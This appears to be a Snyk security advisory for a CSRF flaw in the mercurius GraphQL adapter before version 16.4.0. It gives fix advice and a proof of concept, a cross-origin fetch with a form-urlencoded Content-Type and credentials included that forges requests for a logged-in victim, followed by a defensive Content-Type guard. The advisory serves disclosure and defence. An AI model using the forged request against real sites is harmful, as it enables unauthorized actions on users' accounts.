Cross-site Request Forgery (CSRF) Affecting mercurius package, versions <16.4.0


Severity

medium (CVSS assessment by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept
EPSS: 0.01% (1st percentile)

  • Snyk ID: SNYK-JS-MERCURIUS-15428327
  • Published: 6 Mar 2026
  • Disclosed: 5 Mar 2026
  • Credit: Simone Sanfratello

Introduced: 5 Mar 2026

CVE-2025-64166
CWE-352

How to fix?

Upgrade mercurius to version 16.4.0 or higher.

Overview

mercurius is a GraphQL adapter for Fastify.

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) due to incorrect parsing of the Content-Type header. An attacker can perform unauthorized actions on behalf of an authenticated user by sending specially crafted cross-origin requests that bypass CORS protections.

PoC

// Server-side Fastify setup: a minimal mercurius app with one query resolver.
const Fastify = require('fastify');
const mercurius = require('mercurius');

const app = Fastify();
const schema = `
  type Query {
    hello(name: String): String
  }
`;

const resolvers = {
  Query: {
    hello: (_, { name }) => `Hello ${name || 'World'}!`
  }
};

app.register(mercurius, { schema, resolvers });

// Fastify 4+ expects an options object here rather than a bare port number.
app.listen({ port: 3000 }, (err) => {
  if (err) throw err;
  console.log('Server listening on http://localhost:3000');
});

// Malicious client-side code: a cross-origin POST whose form-urlencoded
// Content-Type is sent without a CORS preflight, with the victim's cookies
// attached (credentials: 'include').
fetch('http://localhost:3000/graphql', {
  method: 'POST',
  body: JSON.stringify({ query: '{ hello(name: "attacker") }' }),
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded'
  },
  credentials: 'include'
});
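The weakness described in the Overview is a Content-Type that is parsed loosely enough for a cross-site "simple" request to reach the GraphQL handler. As an added, defence-in-depth example (not mercurius's own code or its fix, and no substitute for upgrading to 16.4.0), the following gate parses the media type strictly and rejects POSTs to /graphql that do not carry a JSON or GraphQL body type; the hook shape, the /graphql path check and the 415 status are assumptions of this example.

```javascript
// Added example, not mercurius's own code or fix: a defence-in-depth gate for a
// GraphQL endpoint that admits only a media type it parsed itself (the 415
// status, /graphql path check and hook shape are assumptions of this example).

// Media types that legitimately carry a GraphQL request body. The types a
// cross-site <form> or fetch() can send without a CORS preflight
// (application/x-www-form-urlencoded, multipart/form-data, text/plain) are
// deliberately absent, so such a request never reaches a resolver.
const ALLOWED_MEDIA_TYPES = new Set(['application/json', 'application/graphql']);

// Take only the media type from a Content-Type value: drop parameters such as
// "; charset=utf-8", trim whitespace, lowercase. Returns null when the header
// is missing or empty so callers cannot mistake "absent" for a type.
function parseMediaType(headerValue) {
  if (typeof headerValue !== 'string') return null;
  const mediaType = headerValue.split(';')[0].trim().toLowerCase();
  return mediaType.length > 0 ? mediaType : null;
}

// Exact match against the allow-list; a parameter merely containing "application/json" does not count.
function isAllowedGraphqlContentType(headerValue) {
  const mediaType = parseMediaType(headerValue);
  return mediaType !== null && ALLOWED_MEDIA_TYPES.has(mediaType);
}

// Guard for state-changing requests to the GraphQL path. Only request.method,
// request.url, request.headers, reply.code() and reply.send() are touched, so it
// runs on plain objects here and, in production, as a Fastify onRequest hook
// (which runs before any body parsing):
//   app.addHook('onRequest', async (req, reply) => {
//     if (!graphqlCsrfGuard(req, reply)) return reply;
//   });
// Returns true when the request may proceed, false when it was rejected.
function graphqlCsrfGuard(request, reply) {
  if (request.method !== 'POST' || !request.url.startsWith('/graphql')) return true;
  if (isAllowedGraphqlContentType(request.headers['content-type'])) return true;
  reply.code(415).send({ error: 'Unsupported Content-Type for GraphQL' });
  return false;
}

// Constructed sample Content-Type values (not captured traffic) run through the guard.
const SAMPLES = [
  'application/json; charset=utf-8',
  'application/x-www-form-urlencoded',
  'text/plain; boundary=application/json',
];
for (const contentType of SAMPLES) {
  const reply = { code(s) { this.status = s; return this; }, send() { return this; } };
  const ok = graphqlCsrfGuard({ method: 'POST', url: '/graphql', headers: { 'content-type': contentType } }, reply);
  console.log(contentType, '->', ok ? 'allowed' : `rejected with ${reply.status}`);
}
```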
